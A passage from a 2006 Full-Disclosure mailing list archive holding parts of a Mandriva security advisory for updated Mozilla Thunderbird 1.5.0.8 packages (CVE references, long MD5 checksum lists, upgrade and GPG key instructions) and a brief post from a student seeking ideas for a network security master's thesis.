 1eb806fe5a429b52f010e16aeed4cb4a  corporate/3.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.i586.rpm
 1a8da00f3e4033ec813df4548072ac9f  corporate/3.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.i586.rpm
 3a2434c868a3b5799cb69c31d43f900c  corporate/3.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.i586.rpm
 a1bb48121d53f83bf0efd303ea477b71  corporate/3.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
 6f9d308c194ae42cfa0787afdebff2cc  corporate/3.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.i586.rpm
 bb3c3cf4056814131f8031471c81ac6f  corporate/3.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.i586.rpm
 4228aaf098c501a80af97469393482b5  corporate/3.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.i586.rpm
 3a95ad54416e2f002d1aaa32557cf947  corporate/3.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.i586.rpm
 19e1eac0351d89760ee31b4c9ee4fcc4  corporate/3.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.i586.rpm
 1c21de0415bd0223237aa82795cc9600  corporate/3.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.i586.rpm
 a11487e4145c294a57a77491f6996748  corporate/3.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.i586.rpm
 31064002ac59d4857c3c45c3161580dc  corporate/3.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.i586.rpm
 fc88eeba422b084ffa67b77211248ef0  corporate/3.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.i586.rpm
 4ead83e3405e7469370b4f02a9254ddc  corporate/3.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
 3a15b707a6d7f8e9b25c1ccaea023333  corporate/3.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.i586.rpm
 1a8c565fd3b42069b2e42103d98dfab2  corporate/3.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.i586.rpm
 0040d479d7e55304c06df39b2233d12e  corporate/3.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.i586.rpm
 6fab1321b377748e22a6709b772d5159  corporate/3.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.i586.rpm
 1969ec5d6cc27df2f09f9733b5b37c6d  corporate/3.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
 0c34a8e8bd3f9011283fe990771a857a  corporate/3.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.i586.rpm
 68781ca20e2232457046bdab86b59462  corporate/3.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
 37c3909b8feb9a35208519ccf4ec8a46  corporate/3.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.i586.rpm
 ea2febd0e93d9348fd580452f7adc0be  corporate/3.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.i586.rpm
 2eac2aaeb4fe209f98aa85505f6a9b87  corporate/3.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.i586.rpm
 d8d8fc30075f0848859cbe96b26404a7  corporate/3.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.i586.rpm
 3af19a8b01fb316451132e6460c7deb0  corporate/3.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.i586.rpm
 f7aed893e50dff94f47d658d70093824  corporate/3.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.i586.rpm
 ab6ead860edf6de4935aa3bb4ecf4721  corporate/3.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.i586.rpm
 a9b0bc2b2bcf186b5a284cba3d6cad19  corporate/3.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.i586.rpm
 373554b2032c20a61c48f4a4e11e5b57  corporate/3.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.i586.rpm
 1a2efc51627d9f55929e1b33e20f5274  corporate/3.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.i586.rpm
 27ab1d70b317c477b56df8223a8477b4  corporate/3.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.i586.rpm
 0bcd50b34bec84016747f4919b43b8e1  corporate/3.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.i586.rpm
 4b26e1653ccf78604c16b25ed7357dfb  corporate/3.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.i586.rpm
 ea1a0d0349f9a2f26b23c7678d7e5736  corporate/3.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.i586.rpm
 7d7c13e7a820c069b3c657adf57443d9  corporate/3.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.i586.rpm
 ef0755e523de702c802890f494ee5ea0  corporate/3.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.i586.rpm
 f7618d53bff6c0764297f2352c5d0239  corporate/3.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
 8df8db645153b5f7539044d5f892ad54  corporate/3.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.i586.rpm
 d26cb2fbb5301bcf127ea4e4606f52b9  corporate/3.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.i586.rpm
 f57d3dd11471a798542b87f0a3c68e82  corporate/3.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.i586.rpm
 f3aede5440aeb78b59350fe56bb221d2  corporate/3.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.i586.rpm
 bda7588d80565c17190fb407bdc3b1b2  corporate/3.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.i586.rpm
 5f0764d5685d0836bd718fdc86b8a73a  corporate/3.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
 2a1892c7e027dba761df43c98bb5e85f  corporate/3.0/i586/nsinstall-1.5.0.8-1.1.C30mdk.i586.rpm 
 04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
 98c5a4c000178cf57677fa6ee70adb71  corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
 124ecce0dd9a26b565eef6c2f7e14401  corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 c109965ada094232d0958a8121be977a  corporate/3.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.x86_64.rpm
 e50d4054e85e4624b285067c75cfab18  corporate/3.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.x86_64.rpm
 f8cc5e4a36961ef4db2b8632fc6734d9  corporate/3.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
 70e0a1878ce810ee835e7eca08a11e12  corporate/3.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
 50abb11664ca02e6d77cbf30396e5398  corporate/3.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.x86_64.rpm
 5565876286c51872fb0ff90df059f052  corporate/3.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
 cdd3892a5ba2a7c1ffe29d009e9d23a9  corporate/3.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.x86_64.rpm
 ba3e7a92e79e00cd74b722ab94d832eb  corporate/3.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
 c11927081645df376c72f27e8ebc6a85  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.x86_64.rpm
 448172b7c753b48c81b2a2c5d337b9e5  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
 b83c0eb2158672f087fd5754ca27efad  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
 49b91f3eae7a0773ecce62f635a6dfe9  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
 3a0cf5325721e29c4eba9ee7cbc7efb7  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
 cadf1aff1e915adb9e14539eb04521db  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
 8218118b837bf05b3603652f0d4c5690  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 7c7190fc9ec1fc5774436ec7b0c92fd5  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
 a42f63c64470ba933d6239bdf8b1569c  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
 af8c5d7e3569278f3e9d364362be25b3  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
 c749a5b7ac03ad98919f83425fcbd4c2  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
 ac82cd1f4fc0c5ed57be5b165cc65be4  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
 0fbd67977bdfc1b1f9aa3c846c80c244  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
 4d26f0c7b32d3888e1e5c4c14516a4df  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 37fbc8358f1f11d5cb9f0e9b2fab3b26  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 6bec775a601e84be547246ae5638d059  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.x86_64.rpm
 0dc1c40ef6d1a233661048447db25543  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 7ec948cc8df84aae6b3d660bd4187208  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
 4b7ba48ffeff51709b26c8f315a4aaa1  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
 94fceae9b7bc6d48fe2677eecaaf11a6  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 d578499c38c981f2b8cc55fc1351efef  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
 095291274be4a418d05c4e96cb441d90  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 272b554e86966e103d3e7f42b5cba9db  corporate/3.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
 52bd52c4d5eaad6fa541dd20db5411d0  corporate/3.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 2536b28aa209a912ff74601db4e685b4  corporate/3.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.x86_64.rpm
 484ad35799b9a8cd277754bf1b13d686  corporate/3.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
 42ff5a3a8320c4be3ffb1f1d74912f78  corporate/3.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
 8a46a1d9f9380c205699ce090d749ff2  corporate/3.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.x86_64.rpm
 3c30c5aeee783bfabe34fb1ff7357d38  corporate/3.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 a90b14f77d6eed2228bfa55457803f6f  corporate/3.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.x86_64.rpm
 719239492f7d93b04f2c95902fccf94c  corporate/3.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
 f52bcdf19f10745e756f0d58616126df  corporate/3.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
 79826e403152cbe90ddf3bd4d8d64abe  corporate/3.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
 18c08993c8f43c976be6cf2e8cfb2c35  corporate/3.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.x86_64.rpm
 b17866029fe4244a77af59fbb55a07b9  corporate/3.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.x86_64.rpm
 878f59fdb3ebb5929fc23437a17fb5ad  corporate/3.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.x86_64.rpm
 d62fb25dc173e8b12be8623ae8fbf9bf  corporate/3.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
 266322718c7cedd78e89524940f15d55  corporate/3.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 32c5fcab859aff66aaf704b997a1c625  corporate/3.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 17d7eeb0fbd25df1f76d5fa875ef7a3d  corporate/3.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 4aabd47a35cb15547ccbe4eda1b521e8  corporate/3.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 1d8d27be2902605b0eae9dcbd89654cc  corporate/3.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
 6c116048a69b3c176831fde5ff0a252a  corporate/3.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
 e5bcb8518c5a61e63e62f90c363c67ae  corporate/3.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 5569afdd940d28bdf37a1003d5d5d6b0  corporate/3.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
 d00245da432be7a7d268846891555930  corporate/3.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.x86_64.rpm
 ee130a70f9b1fe5719fea63963f3db6d  corporate/3.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 81f41bebeb9eca34d7c27ab81ca41af6  corporate/3.0/x86_64/nsinstall-1.5.0.8-1.1.C30mdk.x86_64.rpm 
 04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
 98c5a4c000178cf57677fa6ee70adb71  corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
 124ecce0dd9a26b565eef6c2f7e14401  corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFU42GmqjQ0CJFipgRAiJgAKDQ8K7lgpOsNzXOQcSOrfcVrHQ4sACeLaqm
75x+jP9FNzlE7ieAV3r7Czs=
=DdKu
-----END PGP SIGNATURE-----



From fajarep at gmail.com  Fri Dec 15 09:44:44 2006
From: fajarep at gmail.com (Fajar Edisya Putera)
Date: Fri, 15 Dec 2006 16:44:44 +0700
Subject: [Full-disclosure] [OOT] Thesis for master degree
Message-ID: <828af05c0612150144x5fac7141qee559e4d3abff5b2@mail.gmail.com>

Hello everyone, sorry for wasting your bandwidth

I'm currently trying to find an interesting topic in computer networking
security for my master degree thesis, I've read a lot of jurnal that related
with computer networking and security. All journal seem to advanced for me,
sometimes the journal has mathematical formula that I don't understand what
is the point for. Maybe someone here willing to help me? an idea? or another
journal website?

Thanks
Sincerely yours
Fajar
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061215/a50fe124/attachment.html 

From security at mandriva.com  Fri Dec 15 23:10:34 2006
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 15 Dec 2006 16:10:34 -0700
Subject: [Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird packages
	fix multiple vulnerabilities
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:206
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : mozilla-thunderbird
 Date    : November 9, 2006
 Affected: 2007.0, Corporate 3.0
 _______________________________________________________________________
 
 Problem Description:
 
 A number of security vulnerabilities have been discovered and corrected
 in the latest Mozilla Thunderbird program, version 1.5.0.8.

 This update provides the latest Thunderbird to correct these issues.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
 http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 488e65dfe45ecf7e3a9e1a3dedd5c2ce  2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
 5e551ab45061148722dda1d7ce66959e  2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
 2149a7fd629b8bc6843c6fdf1bb49efb  2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 0d2315b490e3b8dd2ab791bd6c3ee516  2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 d5583d1b99b948c90e1cad62d753d67d  2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
 00ec607c39d3de4c589997d6c7ee6679  2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 6d1f0f2576362a0bb90b4f9d8c4f2153  2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
 2cb0e44d2e3f7fddd60249843204403f  2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 0c3c771882698d5651775aeed24bfd73  2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
 477ca905391c1d555d0136d46d557869  2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 741811dd392d942b27e1b3b0de695d4e  2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 7c2c4922c6a2c6ce2cb6108a95f7dbfa  2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 7cbf9f3218d587ef97edf01f2298096b  2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 7dbd9e4c16db82a761a7b502c1f7f22d  2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 b6dd6119216f6b748ee7c1570c3b8c37  2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 1eea732e08ca0ef96796c3f50abb1f77  2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1cc5cf2496581d776bb43e2f0dbbea6  2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
 af86ce82ff9053250f82f2215c8dd7e5  2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
 6319633c561c7f68c6614685126da02b  2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
 56387829c6cc83882246e68e3b8704b0  2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
 56cb838bb0c375f53d3cff2eb76a1118  2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
 253500598ff56ab85394e68708ace21d  2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
 53b4d4f1aa4e8174a33a0ed436ce961a  2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
 fb9dd6933d27029538cd01a64ec55cee  2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
 701b9837303a3ed79e6c74c037c28926  2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
 b3739c1344770e92864c50f131f08884  2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
 1efe7ebc2a71e2f2d6c2785026a6e7ac  2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
 6860352b37999652aab785a266673e2f  2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
 51abe323b14793097935b0c221e64f71  2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
 b8ec884437a460c9fbb5c71db6a46c31  2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
 9ae4fb1871ee29f3f7b52210c0cf4e1b  2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1a31b03ffef8e86df09579296fce3c9  2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 6b4bdbb4648231b128655e56015621c7  2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
 d333252ee1ba51351762e4050565ecb1  2007.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
 0a2828dbab70a2be0e721cc016f93d7f  2007.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
 defa2ac291c66f693946362bd2501c40  2007.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.i586.rpm
 c5540aa8289eefbf3e708e442de77aa8  2007.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
 45da9968c4661ef994ef1dcefd0ad54f  2007.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.i586.rpm
 df8d2ea1013a65457aa1f2100060d968  2007.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
 f87f2441b2ca36d4f5c3f3f2dd04b3bb  2007.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.i586.rpm
 bc3a281fbc5c09b7f962dfb1d3b9e517  2007.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
 2563050985477697472069d08e96de0f  2007.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.i586.rpm
 e22be985ae58ab3eba5b90aa6a3eb58e  2007.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.i586.rpm
 fde0d1b9c4feee3c1e239345f4065090  2007.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.i586.rpm
 10be2386887a6c70bc4f9c0453b33072  2007.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
 1c92d5ee79fc52ec1525f3c96dfa1916  2007.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
 42e6ddb4a33a297c71b996bf651a4d69  2007.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
 96394d1245284a886b954bb063c0ab5b  2007.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
 8386317130e064260bd8b114616410ed  2007.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
 eb622e8adc0767e090a608e80a1611b7  2007.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
 3ca6736aaf725851a0be21f0490aeb20  2007.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
 47b16b8c45acc936b62051594ed87c69  2007.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
 c2e742162882c52761040025ff4ddfff  2007.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
 072c5224bd49a45ba7ab0a57f657ec6e  2007.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.i586.rpm
 3393e810730d305adc4fe8ecc98b782a  2007.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
 70882501b0fc01a56cee67c2b7c63ac5  2007.0/i586/nsinstall-1.5.0.8-1.1mdv2007.0.i586.rpm 
 e408368ca02e7efbbece9adbaaea7d56  2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
 7867a124b85e4a8098ec7b814267c1f5  2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
 e776e0c4c5a6ff592af0c346bf8b4511  2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 47aa8c7af46ee44f1b51e0f44772beeb  2007.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e284b46733e04ab96cccb612de04e5a8  2007.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e73efd093c48aa82d6f73025f1ade443  2007.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 ed790bdd1a45343b427925765f5f2b5c  2007.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 61690a97ef04b6083693ffe4a9ab3176  2007.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 889574eda89385739aad6eda7f3d2604  2007.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 ef9b59cdd619da74737b5e91e4067386  2007.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e20a88ece32f8ee81aaedd828558d880  2007.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 250f6f86984922da278774d480ba37a7  2007.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 f683dba38c9055cbac36f8468e357ebf  2007.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
